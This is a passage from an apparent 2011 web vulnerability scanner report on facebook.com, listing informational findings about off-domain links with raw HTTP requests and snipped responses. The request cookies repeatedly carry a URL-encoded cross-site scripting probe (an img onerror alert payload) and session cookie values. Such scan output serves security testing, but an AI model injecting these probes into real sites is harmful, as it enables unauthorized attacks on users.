Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.31
Connection: close
Date: Thu, 05 May 2011 11:42:17 GMT
Content-Length: 44083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/5HRFtNmxswh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

16.32. http://www.facebook.com/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/careers/?ref=pf
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/y2/r/wCF9j03F8UH.css
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/rA11fLEN3pu.png
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yM/r/8KSjR8nTFnM.png
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yM/r/HlLCuk3U6Q6.css
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yP/r/VLLIdFco_FS.png
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/p2EQhKqozYb.png
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yY/r/bNFbcydj77T.css
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yr/r/N5R94dW584a.png
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/KDo2iiCy_gr.png
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/th3CHMrbvY-.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/dNZ8lADSyV5.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/64Qw6hJnpsg.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/BmRBrG86u58.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OlBs86PzVAS.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/h_raeRCe0vp.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IQqCjk5NiJN.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/MoxBq-TLXDr.jpg
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.151.69
Connection: close
Date: Thu, 05 May 2011 11:43:02 GMT
Content-Length: 20523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y2/r/wCF9j03F8UH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yM/r/HlLCuk3U6Q6.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yY/r/bNFbcydj77T.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/th3CHMrbvY-.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div id="home_welcome"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/MoxBq-TLXDr.jpg" /><div class="home_header_description">
...[SNIP]...
<a href="/careers/department.php?dept=engineering"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yM/r/8KSjR8nTFnM.png" class="careers_dept_img" title="Software Engineering" alt="Software Engineering" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=legal"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IQqCjk5NiJN.png" class="careers_dept_img" title="Legal, Finance, Facilities &amp; Admin" alt="Legal, Finance, Facilities &amp; Admin" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=communications"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/64Qw6hJnpsg.png" class="careers_dept_img" title="Communications &amp; Public Policy" alt="Communications &amp; Public Policy" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=product-management"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/BmRBrG86u58.png" class="careers_dept_img" title="Product Management" alt="Product Management" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=IT"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/KDo2iiCy_gr.png" class="careers_dept_img" title="IT &amp; Security" alt="IT &amp; Security" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=hr"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/dNZ8lADSyV5.png" class="careers_dept_img" title="HR &amp; Recruiting" alt="HR &amp; Recruiting" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=design"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OlBs86PzVAS.png" class="careers_dept_img" title="Design &amp; User Experience" alt="Design &amp; User Experience" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=tech-ops"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/p2EQhKqozYb.png" class="careers_dept_img" title="Technical Operations" alt="Technical Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=growth"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yP/r/VLLIdFco_FS.png" class="careers_dept_img" title="Growth &amp; Internationalization" alt="Growth &amp; Internationalization" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=sales"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/rA11fLEN3pu.png" class="careers_dept_img" title="Sales &amp; Business Development" alt="Sales &amp; Business Development" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=online-ops"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/h_raeRCe0vp.png" class="careers_dept_img" title="Online Operations" alt="Online Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=platform"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yr/r/N5R94dW584a.png" class="careers_dept_img" title="Platform &amp; Product Marketing" alt="Platform &amp; Product Marketing" /></a>
...[SNIP]...

16.33. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/find-friends?ref=pf
The response contains the following links to other domains:

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
X-Cnection: close
Date: Thu, 05 May 2011 11:43:46 GMT
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/2OeU71A9ZhJ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/abFky1K8JdH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/2XNEznNudOF.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/zicApnLO7GQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/xKbCsbIPd0I.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/icQpW-keluF.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/YAJGksZgfUN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/h7_K_gtPWhX.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/zA_b_yEgHGT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...

16.34. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/find-friends?ref=pf
The response contains the following links to other domains:

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.37
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 101670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/2OeU71A9ZhJ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/PCbd6PhRsDA.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yp/r/2XNEznNudOF.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yB/r/g1_xu8gB24T.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y_/r/LIzUXgNfPj0.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yD/r/0d5n7jCSVre.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/F6vZSVqitFo.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yh/r/u4-kKjNrCF1.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OelUOcifsbh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...

16.35. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/help/?ref=pf
The response contains the following links to other domains:

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; made_write_conn=1304595678; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; W=1304595678

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.61
X-Cnection: close
Date: Thu, 05 May 2011 11:44:15 GMT
Content-Length: 20118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/zhBrOmLKnYo.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/ijofM1PtQgR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/iitWafmrmXE.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/tbLZ3xbV8NS.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/YAJGksZgfUN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HZ2miH23DO_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/G56BmZyYUs2.png" alt="" width="23" height="23" /><div class="clearfix selected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/GzjD8q3xBN2.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...

16.36. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/help/?ref=pf
The response contains the following links to other domains:

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
